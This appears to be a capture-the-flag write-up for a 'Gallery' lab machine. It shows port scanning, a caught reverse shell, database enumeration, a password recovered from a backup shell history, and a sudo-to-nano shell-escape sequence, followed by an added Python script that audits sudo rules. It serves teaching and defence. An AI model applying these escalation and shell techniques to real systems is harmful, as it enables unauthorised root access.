```
# Nmap 7.92 scan initiated Sat Mar 19 17:36:17 2022 as: nmap -sSVC -p- -T4 -v -oA nmap_full 10.10.183.201
Nmap scan report for 10.10.183.201
Host is up (0.065s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
| http-methods:
|_  Supported Methods: GET POST OPTIONS HEAD
8080/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-title: Simple Image Gallery System
|_http-favicon: Unknown favicon MD5: C1C16B6A8BE19F84F01DD24B3DF247BB

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Mar 19 17:37:00 2022 -- 1 IP address (1 host up) scanned in 42.62 seconds
```
```
$ ncat -lvnp 9999
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999
Ncat: Connection from 10.10.183.201.
Ncat: Connection from 10.10.183.201:38198.
bash: cannot set terminal process group (708): Inappropriate ioctl for device
bash: no job control in this shell
www-data@gallery:/var/www/html/gallery/uploads$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
To interact with the database we first need a proper TTY allocated.
```
$ mysql -u gallery_user -p
MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| gallery_db         |
| information_schema |
+--------------------+
2 rows in set (0.00 sec)

MariaDB [(none)]> use gallery_db;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [gallery_db]> show tables;
+----------------------+
| Tables_in_gallery_db |
+----------------------+
| album_list           |
| images               |
| system_info          |
| users                |
+----------------------+
4 rows in set (0.00 sec)
```
```
www-data@gallery:/$ ls -lhA /var/backups
total 52K
-rw-r--r-- 1 root root  34K Feb 12 21:40 apt.extended_states.0
-rw-r--r-- 1 root root 3.7K Aug 25  2021 apt.extended_states.1.gz
-rw-r--r-- 1 root root 3.5K May 21  2021 apt.extended_states.2.gz
-rw-r--r-- 1 root root 3.5K May 20  2021 apt.extended_states.3.gz
drwxr-xr-x 5 root root 4.0K May 24  2021 mike_home_backup

www-data@gallery:/var/backups/mike_home_backup$ ls -lhA
total 28K
-rwxr-xr-x 1 root root  135 May 24  2021 .bash_history
-rwxr-xr-x 1 root root  220 May 24  2021 .bash_logout
-rwxr-xr-x 1 root root 3.7K May 24  2021 .bashrc
drwxr-xr-x 3 root root 4.0K May 24  2021 .gnupg
-rwxr-xr-x 1 root root  807 May 24  2021 .profile
drwxr-xr-x 2 root root 4.0K May 24  2021 documents
drwxr-xr-x 2 root root 4.0K May 24  2021 images

www-data@gallery:/var/backups/mike_home_backup$ cat .bash_history
cat .bash_history
cd ~
ls
ping 1.1.1.1
cat /home/mike/user.txt
cd /var/www/
ls
cd html
ls -al
cat index.html
sudo -lb3stpassw0rdbr0xx
clear
sudo -l
exit

www-data@gallery:/var/backups/mike_home_backup$ su mike
```
```
mike@gallery:~$ sudo -l
Matching Defaults entries for mike on gallery:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mike may run the following commands on gallery:
    (root) NOPASSWD: /bin/bash /opt/rootkit.sh
```
```
mike@gallery:~$ ls -lh /opt/rootkit.sh
-rw-r--r-- 1 root root 364 May 20  2021 /opt/rootkit.sh
mike@gallery:~$ cat /opt/rootkit.sh
```

/opt/rootkit.sh

```bash
#!/bin/bash
read -e -p "Would you like to versioncheck, update, list or read the report ? " ans;
```
nano can be escaped to launch a shell, so being able to run nano as root means we can get a root shell.
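As an added defender's example (not part of the original writeup): a small Python audit of what makes the `sudo -l` entry above dangerous. A NOPASSWD rule whose "command" is an interpreter grants whatever the wrapped script does, and if that script runs an editor with a documented shell escape, the rule is effectively a root shell. The sample script body is constructed (only its `read` prompt appears on the page), and the interpreter and escape-capable program lists are assumptions, not an exhaustive catalogue.

```python
import re
import shlex

# Assumed lists: interpreters that turn "the allowed command" into "whatever the
# script does", and interactive programs documented (e.g. on GTFOBins) as able to
# spawn a shell when run with elevated privileges.
INTERPRETERS = {"/bin/bash", "/bin/sh", "/usr/bin/bash", "/usr/bin/python3", "/usr/bin/perl"}
SHELL_ESCAPE_PROGRAMS = {"nano", "vi", "vim", "less", "more", "man"}

# One command line as printed by `sudo -l`: "(runas) TAG: TAG: command args".
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>.+?)\s*$")

def audit_sudo_rule(rule, read_script=lambda path: None):
    """Return a list of findings for one sudo rule. read_script(path) returns the
    text of the wrapped script, or None if it cannot be read."""
    m = RULE_RE.match(rule)
    if not m:
        return ["unparseable rule: %r" % rule]
    findings = []
    tags = {t.strip(":") for t in m.group("tags").split()}
    argv = shlex.split(m.group("cmd"))
    if "NOPASSWD" in tags and m.group("runas") in ("root", "ALL"):
        findings.append("NOPASSWD rule as root: a stolen or guessed user password is enough")
    if argv and argv[0] in INTERPRETERS and len(argv) > 1:
        findings.append("interpreter wrapper: effective command is %s, not %s" % (argv[1], argv[0]))
        body = read_script(argv[1])
        if body is not None:
            for prog in sorted(SHELL_ESCAPE_PROGRAMS):
                # Match the program at the start of a command, with or without a path.
                pattern = r"(?m)(?:^|[;&|]|\$\()\s*(?:/\S*/)?%s\b" % re.escape(prog)
                if re.search(pattern, body):
                    findings.append("script runs %s as root; it has a documented shell escape" % prog)
    return findings

# Constructed sample input. The rule is the one from `sudo -l` above; the script
# body is a stand-in, NOT the real /opt/rootkit.sh (only its first lines are shown).
SAMPLE_RULE = "(root) NOPASSWD: /bin/bash /opt/rootkit.sh"
SAMPLE_SCRIPT = """#!/bin/bash
read -e -p "Would you like to versioncheck, update, list or read the report ? " ans;
if [ "$ans" = "read" ]; then
    nano /var/log/report.log
fi
"""

def demo():
    return audit_sudo_rule(SAMPLE_RULE, read_script=lambda p: SAMPLE_SCRIPT if p == "/opt/rootkit.sh" else None)

if __name__ == "__main__":
    for finding in demo():
        print("-", finding)
```

The same check applied to a rule like `(root) /usr/bin/systemctl restart apache2` returns no findings, which is the kind of narrowly scoped entry the rule above should have been.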
```
$ gtfoblookup gtfobins search -c sudo nano
nano:
    sudo:
        Code: sudo nano
              ^R^X
              reset; sh 1>&0 2>&0
```
Let's do that. But even with a proper TTY allocated and the TERM environment variable set correctly, it won't work, so we will have to use socat, since SSH is not exposed.